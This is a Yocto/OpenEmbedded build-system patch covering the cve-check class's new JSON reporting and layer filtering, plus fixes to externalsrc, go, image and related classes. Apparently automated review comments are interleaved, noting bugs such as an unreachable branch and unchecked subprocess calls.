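Review bot: The added `if cve in cve_whitelist: ignored = True` inside the `product_cursor` loop can never fire, because the outer loop already appends a whitelisted CVE to `cves_ignored` and hits `continue` before reaching this point. `ignored` therefore stays False, and the `if ignored:` branch added in the later hunk at `@@ -283,18 +353,27 @@` is unreachable; either drop both or add a comment naming the second source of ignores that is expected here. Separately, the bare `except:` around the `Version` comparisons also catches KeyboardInterrupt, so `except Exception:` would be safer. What `vulnerable_start` is set to after a failed comparison lies outside the hunk, so it is worth confirming that a parse failure does not default to "not vulnerable". check_cves starts and ends outside this hunk.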
@@ -268,8 +338,8 @@ def check_cves(d, patched_cves):
if operator_end:
try:
- vulnerable_end = (operator_end == '<=' and LooseVersion(pv) <= LooseVersion(version_end))
- vulnerable_end |= (operator_end == '<' and LooseVersion(pv) < LooseVersion(version_end))
+ vulnerable_end = (operator_end == '<=' and Version(pv,suffix) <= Version(version_end,suffix) )
+ vulnerable_end |= (operator_end == '<' and Version(pv,suffix) < Version(version_end,suffix) )
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_end, version_end, cve))
@@ -283,18 +353,27 @@ def check_cves(d, patched_cves):
vulnerable = vulnerable_start or vulnerable_end
if vulnerable:
- bb.note("%s-%s is vulnerable to %s" % (product, pv, cve))
- cves_unpatched.append(cve)
+ if ignored:
+ bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
+ cves_ignored.append(cve)
+ else:
+ bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
+ cves_unpatched.append(cve)
break
+ product_cursor.close()
if not vulnerable:
- bb.note("%s-%s is not vulnerable to %s" % (product, pv, cve))
- # TODO: not patched but not vulnerable
+ bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
patched_cves.add(cve)
+ cve_cursor.close()
+
+ if not cves_in_product:
+ bb.note("No CVE records found for product %s, pn %s" % (product, pn))
+ cves_status.append([product, False])
conn.close()
- return (list(cve_whitelist), list(patched_cves), cves_unpatched)
+ return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
def get_cve_info(d, cves):
"""
@@ -304,39 +383,66 @@ def get_cve_info(d, cves):
import sqlite3
cve_data = {}
- conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE"))
+ db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
+ conn = sqlite3.connect(db_file, uri=True)
for cve in cves:
- for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)):
+ cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
+ for row in cursor:
cve_data[row[0]] = {}
cve_data[row[0]]["summary"] = row[1]
cve_data[row[0]]["scorev2"] = row[2]
cve_data[row[0]]["scorev3"] = row[3]
cve_data[row[0]]["modified"] = row[4]
cve_data[row[0]]["vector"] = row[5]
-
+ cursor.close()
conn.close()
return cve_data
-def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
+def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
"""
Write CVE information in WORKDIR; and to CVE_CHECK_DIR, and
CVE manifest if enabled.
"""
cve_file = d.getVar("CVE_CHECK_LOG")
- nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId="
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ # Early exit, the text format does not report packages without CVEs
+ if not patched+unpatched+whitelisted:
+ return
+
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
write_string = ""
unpatched_cves = []
bb.utils.mkdirhier(os.path.dirname(cve_file))
for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in whitelisted
+
+ if (is_patched or is_ignored) and not report_all:
+ continue
+
+ write_string += "LAYER: %s\n" % layer
write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
write_string += "CVE: %s\n" % cve
- if cve in whitelisted:
+ if is_ignored:
write_string += "CVE STATUS: Whitelisted\n"
- elif cve in patched:
+ elif is_patched:
write_string += "CVE STATUS: Patched\n"
else:
unpatched_cves.append(cve)
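Review bot: `layer = fdir_name.split("/")[-3]` in cve_write_data_text assumes every recipe sits exactly two directories below its layer root, and that guess then decides, through CVE_CHECK_LAYER_INCLUDELIST and CVE_CHECK_LAYER_EXCLUDELIST, whether the recipe's CVEs are reported at all. A recipe at another depth gets a directory name that is not its layer, so with an include list set it is dropped from the report silently, and a FILE_DIRNAME with fewer than three components raises IndexError. At minimum add a comment such as `# assumes <layer>/recipes-*/<pn>/ layout; other depths give a wrong layer name` and log the two early returns with `bb.debug`; cve_write_data_json in the last hunk of this file repeats the same derivation. The docstring should also mention the layer filter and CVE_CHECK_REPORT_PATCHED, which it currently does not. cve_write_data_text continues outside the hunk.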
@@ -347,7 +453,7 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
- if unpatched_cves:
+ if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
with open(cve_file, "w") as f:
@@ -355,9 +461,8 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
f.write(write_string)
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- cve_dir = d.getVar("CVE_CHECK_DIR")
- bb.utils.mkdirhier(cve_dir)
- deploy_file = os.path.join(cve_dir, d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
with open(deploy_file, "w") as f:
f.write(write_string)
@@ -367,3 +472,119 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
f.write("%s" % write_string)
+
+def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
+ """
+ Write CVE information in the JSON format: to WORKDIR; and to
+ CVE_CHECK_DIR, if CVE manifest if enabled, write fragment
+ files that will be assembled at the end in cve_check_write_rootfs_manifest.
+ """
+
+ import json
+
+ write_string = json.dumps(output, indent=2)
+ with open(direct_file, "w") as f:
+ bb.note("Writing file %s with CVE information" % direct_file)
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_COPY_FILES") == "1":
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
+ with open(deploy_file, "w") as f:
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
+ cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
+ index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ bb.utils.mkdirhier(cvelogpath)
+ fragment_file = os.path.basename(deploy_file)
+ fragment_path = os.path.join(cvelogpath, fragment_file)
+ with open(fragment_path, "w") as f:
+ f.write(write_string)
+ with open(index_path, "a+") as f:
+ f.write("%s\n" % fragment_path)
+
+def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
+ """
+ Prepare CVE data for the JSON format, then write it.
+ """
+
+ output = {"version":"1", "package": []}
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
+
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ unpatched_cves = []
+
+ product_data = []
+ for s in cve_status:
+ p = {"product": s[0], "cvesInRecord": "Yes"}
+ if s[1] == False:
+ p["cvesInRecord"] = "No"
+ product_data.append(p)
+
+ package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
+ package_data = {
+ "name" : d.getVar("PN"),
+ "layer" : layer,
+ "version" : package_version,
+ "products": product_data
+ }
+ cve_list = []
+
+ for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in ignored
+ status = "Unpatched"
+ if (is_patched or is_ignored) and not report_all:
+ continue
+ if is_ignored:
+ status = "Ignored"
+ elif is_patched:
+ status = "Patched"
+ else:
+ # default value of status is Unpatched
+ unpatched_cves.append(cve)
+
+ issue_link = "%s%s" % (nvd_link, cve)
+
+ cve_item = {
+ "id" : cve,
+ "summary" : cve_data[cve]["summary"],
+ "scorev2" : cve_data[cve]["scorev2"],
+ "scorev3" : cve_data[cve]["scorev3"],
+ "vector" : cve_data[cve]["vector"],
+ "status" : status,
+ "link": issue_link
+ }
+ cve_list.append(cve_item)
+
+ package_data["issue"] = cve_list
+ output["package"].append(package_data)
+
+ direct_file = d.getVar("CVE_CHECK_LOG_JSON")
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
+
+ cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
+
+def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
+ """
+ Write CVE data in each enabled format.
+ """
+
+ if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
+ cve_write_data_text(d, patched, unpatched, ignored, cve_data)
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
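Review bot: cve_write_data_json collects `unpatched_cves` but never reads it, so with CVE_CHECK_FORMAT_TEXT set to "0" and CVE_CHECK_FORMAT_JSON set to "1" a recipe with unpatched CVEs builds without the `bb.warn` that only cve_write_data_text emits. Moving that warning into cve_write_data, guarded by `d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1"`, would make it independent of the output format and avoid a duplicate when both formats are enabled. In cve_check_write_json_output the `manifest_file` parameter is unused, and the docstring's "if CVE manifest if enabled" should read "if the CVE manifest is enabled". The append to CVE_CHECK_SUMMARY_INDEX_PATH is done without a lock, which deserves a comment if several tasks can write it at once.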
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
more = i.runsource(source, "<pyshell>")
if not more:
buf = []
+ sys.stderr.flush()
prompt(more)
except KeyboardInterrupt:
i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
# Run do_patch function with the override applied
localdata = bb.data.createCopy(d)
localdata.setVar('OVERRIDES', ':'.join(no_overrides))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
# Reset back to the initial commit on a new branch
bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
# Run do_patch function with the override applied
- localdata.appendVar('OVERRIDES', ':%s' % override)
+ localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
#
# Usage:
# BBCLASSEXTEND = "devupstream:target"
-# SRC_URI_class-devupstream = "git://git.example.com/example"
+# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
# SRCREV_class-devupstream = "abcdef"
#
# If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/distutils-common-base.bbclass b/meta/classes/distutils-common-base.bbclass
index 94b5fd426d..43a38e5a3a 100644
--- a/meta/classes/distutils-common-base.bbclass
+++ b/meta/classes/distutils-common-base.bbclass
@@ -11,7 +11,7 @@ export LDCXXSHARED = "${CXX} -shared"
export CCSHARED = "-fPIC -DPIC"
# LINKFORSHARED are the flags passed to the $(CC) command that links
# the python executable
-export LINKFORSHARED = "{SECURITY_CFLAGS} -Xlinker -export-dynamic"
+export LINKFORSHARED = "${SECURITY_CFLAGS} -Xlinker -export-dynamic"
FILES_${PN} += "${libdir}/* ${libdir}/${PYTHON_DIR}/*"
diff --git a/meta/classes/distutils3-base.bbclass b/meta/classes/distutils3-base.bbclass
index 7dbf07ac4b..a277d1c7bc 100644
--- a/meta/classes/distutils3-base.bbclass
+++ b/meta/classes/distutils3-base.bbclass
@@ -1,5 +1,5 @@
DEPENDS += "${@["${PYTHON_PN}-native ${PYTHON_PN}", ""][(d.getVar('PACKAGES') == '')]}"
RDEPENDS_${PN} += "${@['', '${PYTHON_PN}-core']['${CLASSOVERRIDE}' == 'class-target']}"
-inherit distutils-common-base python3native
+inherit distutils-common-base python3native python3targetconfig
diff --git a/meta/classes/distutils3.bbclass b/meta/classes/distutils3.bbclass
index 7356b5245a..a916a8000c 100644
--- a/meta/classes/distutils3.bbclass
+++ b/meta/classes/distutils3.bbclass
@@ -12,28 +12,30 @@ DISTUTILS_INSTALL_ARGS ?= "--root=${D} \
DISTUTILS_PYTHON = "python3"
DISTUTILS_PYTHON_class-native = "nativepython3"
+DISTUTILS_SETUP_PATH ?= "${S}"
+
distutils3_do_configure() {
:
}
distutils3_do_compile() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
NO_FETCH_BUILD=1 \
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} ${DISTUTILS_BUILD_ARGS} || \
bbfatal_log "'${PYTHON_PN} setup.py build ${DISTUTILS_BUILD_ARGS}' execution failed."
}
distutils3_do_compile[vardepsexclude] = "MACHINE"
distutils3_do_install() {
- cd ${S}
+ cd ${DISTUTILS_SETUP_PATH}
install -d ${D}${PYTHON_SITEPACKAGES_DIR}
STAGING_INCDIR=${STAGING_INCDIR} \
STAGING_LIBDIR=${STAGING_LIBDIR} \
PYTHONPATH=${D}${PYTHON_SITEPACKAGES_DIR} \
- ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} ${S}/setup.py \
+ ${STAGING_BINDIR_NATIVE}/${PYTHON_PN}-native/${PYTHON_PN} setup.py \
build --build-base=${B} install --skip-build ${DISTUTILS_INSTALL_ARGS} || \
bbfatal_log "'${PYTHON_PN} setup.py install ${DISTUTILS_INSTALL_ARGS}' execution failed."
diff --git a/meta/classes/externalsrc.bbclass b/meta/classes/externalsrc.bbclass
index d200129987..9c9451e528 100644
--- a/meta/classes/externalsrc.bbclass
+++ b/meta/classes/externalsrc.bbclass
@@ -60,7 +60,7 @@ python () {
if externalsrcbuild:
d.setVar('B', externalsrcbuild)
else:
- d.setVar('B', '${WORKDIR}/${BPN}-${PV}/')
+ d.setVar('B', '${WORKDIR}/${BPN}-${PV}')
local_srcuri = []
fetch = bb.fetch2.Fetch((d.getVar('SRC_URI') or '').split(), d)
@@ -108,6 +108,15 @@ python () {
if local_srcuri and task in fetch_tasks:
continue
bb.build.deltask(task, d)
+ if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack':
+ # The reproducible_build's create_source_date_epoch_stamp function must
+ # be run after the source is available and before the
+ # do_deploy_source_date_epoch task. In the normal case, it's attached
+ # to do_unpack as a postfuncs, but since we removed do_unpack (above)
+ # we need to move the function elsewhere. The easiest thing to do is
+ # move it into the prefuncs of the do_deploy_source_date_epoch task.
+ # This is safe, as externalsrc runs with the source already unpacked.
+ d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ')
d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ")
d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ")
@@ -190,6 +199,7 @@ def srctree_hash_files(d, srcdir=None):
import shutil
import subprocess
import tempfile
+ import hashlib
s_dir = srcdir or d.getVar('EXTERNALSRC')
git_dir = None
@@ -197,6 +207,10 @@ def srctree_hash_files(d, srcdir=None):
try:
git_dir = os.path.join(s_dir,
subprocess.check_output(['git', '-C', s_dir, 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ top_git_dir = os.path.join(d.getVar("TOPDIR"),
+ subprocess.check_output(['git', '-C', d.getVar("TOPDIR"), 'rev-parse', '--git-dir'], stderr=subprocess.DEVNULL).decode("utf-8").rstrip())
+ if git_dir == top_git_dir:
+ git_dir = None
except subprocess.CalledProcessError:
pass
@@ -210,7 +224,18 @@ def srctree_hash_files(d, srcdir=None):
env = os.environ.copy()
env['GIT_INDEX_FILE'] = tmp_index.name
subprocess.check_output(['git', 'add', '-A', '.'], cwd=s_dir, env=env)
- sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ git_sha1 = subprocess.check_output(['git', 'write-tree'], cwd=s_dir, env=env).decode("utf-8")
+ if os.path.exists(os.path.join(s_dir, ".gitmodules")) and os.path.getsize(os.path.join(s_dir, ".gitmodules")) > 0:
+ submodule_helper = subprocess.check_output(["git", "config", "--file", ".gitmodules", "--get-regexp", "path"], cwd=s_dir, env=env).decode("utf-8")
+ for line in submodule_helper.splitlines():
+ module_dir = os.path.join(s_dir, line.rsplit(maxsplit=1)[1])
+ if os.path.isdir(module_dir):
+ proc = subprocess.Popen(['git', 'add', '-A', '.'], cwd=module_dir, env=env, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+ proc.communicate()
+ proc = subprocess.Popen(['git', 'write-tree'], cwd=module_dir, env=env, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
+ stdout, _ = proc.communicate()
+ git_sha1 += stdout.decode("utf-8")
+ sha1 = hashlib.sha1(git_sha1.encode("utf-8")).hexdigest()
with open(oe_hash_file, 'w') as fobj:
fobj.write(sha1)
ret = oe_hash_file + ':True'
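Review bot: The two `subprocess.Popen` calls added for submodules discard both the exit status and stderr, unlike the top-level `check_output` calls just above them. A failing `git write-tree` in a submodule would then add an empty string to `git_sha1`, and the resulting hash would no longer change when that submodule does. Using `subprocess.check_output(['git', 'write-tree'], cwd=module_dir, env=env)`, and `subprocess.check_call` for the `git add`, keeps such failures visible. `line.rsplit(maxsplit=1)[1]` takes only the last whitespace-separated token, so a submodule path containing a space resolves to the wrong directory and is skipped by the `os.path.isdir` test. srctree_hash_files begins and ends outside this hunk.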
diff --git a/meta/classes/fs-uuid.bbclass b/meta/classes/fs-uuid.bbclass
index 9b53dfba7a..731ea575bd 100644
--- a/meta/classes/fs-uuid.bbclass
+++ b/meta/classes/fs-uuid.bbclass
@@ -4,7 +4,7 @@
def get_rootfs_uuid(d):
import subprocess
rootfs = d.getVar('ROOTFS')
- output = subprocess.check_output(['tune2fs', '-l', rootfs])
+ output = subprocess.check_output(['tune2fs', '-l', rootfs], text=True)
for line in output.split('\n'):
if line.startswith('Filesystem UUID:'):
uuid = line.split()[-1]
diff --git a/meta/classes/go.bbclass b/meta/classes/go.bbclass
index a9e31b50ea..21b1a0271e 100644
--- a/meta/classes/go.bbclass
+++ b/meta/classes/go.bbclass
@@ -115,9 +115,10 @@ go_do_install() {
install -d ${D}${libdir}/go/src/${GO_IMPORT}
tar -C ${S}/src/${GO_IMPORT} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' . | \
tar -C ${D}${libdir}/go/src/${GO_IMPORT} --no-same-owner -xf -
- tar -C ${B} -cf - --exclude-vcs pkg | tar -C ${D}${libdir}/go --no-same-owner -xf -
+ tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
+ tar -C ${D}${libdir}/go --no-same-owner -xf -
- if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then
+ if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
install -d ${D}${bindir}
install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
fi
@@ -144,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
INSANE_SKIP_${PN} += "ldflags"
-# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips
-# doesn't support -buildmode=pie, so skip the QA checking for mips and its
-# variants.
+# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'):
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
def go_map_os(o, d):
if o.startswith('linux'):
return 'linux'
+ elif o.startswith('mingw'):
+ return 'windows'
return o
diff --git a/meta/classes/grub-efi-cfg.bbclass b/meta/classes/grub-efi-cfg.bbclass
index 3a2cdd698b..ea21b3de3d 100644
--- a/meta/classes/grub-efi-cfg.bbclass
+++ b/meta/classes/grub-efi-cfg.bbclass
@@ -120,3 +120,4 @@ python build_efi_cfg() {
cfgfile.close()
}
+build_efi_cfg[vardepsexclude] += "OVERRIDES"
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
virtual/kernel:do_deploy \
${MLPREFIX}syslinux:do_populate_sysroot \
syslinux-native:do_populate_sysroot \
- ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \
+ ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
"
@@ -261,4 +261,4 @@ python do_bootimg() {
do_bootimg[subimages] = "hddimg iso"
do_bootimg[imgsuffix] = "."
-addtask bootimg before do_image_complete
+addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
# Generate companion debugfs?
IMAGE_GEN_DEBUGFS ?= "0"
-# These pacackages will be installed as additional into debug rootfs
+# These packages will be installed as additional into debug rootfs
IMAGE_INSTALL_DEBUGFS ?= ""
# These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
python () {
- variables = rootfs_command_variables(d) + sdk_command_variables(d)
+ variables = rootfs_command_variables(d)
for var in variables:
if d.getVar(var, False):
d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
def rootfs_variables(d):
from oe.rootfs import variable_depends
variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
- 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY',
+ 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
+# per default create a locale archive
+IMAGE_LOCALES_ARCHIVE ?= '1'
+
# Prefer image, but use the fallback files for lookups if the image ones
# aren't yet available.
PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
+
PACKAGE_EXCLUDE ??= ""
PACKAGE_EXCLUDE[type] = "list"
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
except oe.utils.ImageQAFailed as e:
qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
except Exception as e:
- qamsg = qamsg + '\tImage QA function %s failed\n' % cmd
+ qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
if qamsg:
imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
localdata.delVar('DATETIME')
localdata.delVar('DATE')
localdata.delVar('TMPDIR')
- vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split()
+ vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
for dep in vardepsexclude:
localdata.delVar(dep)
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
fi
# Set mtime of all files to a reproducible value
bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
- find ${IMAGE_ROOTFS} -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \;
+ find ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
fi
}
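Review bot: The pipeline on the new `find … | xargs` line reports only xargs's exit status, so an error from find itself (an unreadable directory, a path that vanishes mid-walk) no longer fails the task and some files can keep their build-time mtime. `find "${IMAGE_ROOTFS}" -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} +` batches arguments the same way without the pipe and keeps find's status. Quoting `${IMAGE_ROOTFS}` also protects against word splitting. reproducible_final_image_task starts outside the hunk.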
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index f82f1d8862..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -126,7 +126,7 @@ IMAGE_CMD_squashfs-lz4 = "mksquashfs ${IMAGE_ROOTFS} ${IMGDEPLOYDIR}/${IMAGE_NAM
# required when extracting, but it seems prudent to use it in both cases.
IMAGE_CMD_TAR ?= "tar"
# ignore return code 1 "file changed as we read it" as other tasks(e.g. do_image_wic) may be hardlinking rootfs
-IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
+IMAGE_CMD_tar = "${IMAGE_CMD_TAR} --sort=name --format=posix --numeric-owner -cf ${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.tar -C ${IMAGE_ROOTFS} . || [ $? -eq 1 ]"
